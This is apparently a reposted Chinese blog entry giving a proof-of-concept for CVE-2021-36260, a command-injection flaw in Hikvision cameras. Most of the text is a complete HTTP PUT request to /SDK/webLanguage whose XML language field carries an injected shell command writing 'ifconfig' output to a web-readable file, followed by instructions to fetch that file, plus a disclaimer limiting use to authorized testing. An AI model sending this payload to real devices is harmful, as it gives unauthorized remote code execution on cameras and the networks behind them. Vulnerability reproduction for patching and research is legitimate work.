poc:
POC:
PUT /SDK/webLanguage HTTP/1.1
Host: 192.168.0.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=zh
Upgrade-Insecure-Requests: 1
Content-Length: 102
<language>
$(ifconfig -a > webLib/a.asp)
</language>
GET访问/a.asp
小知识
声明
本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。
好文推荐
原文始发于微信公众号(丁永博的成长日记):HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论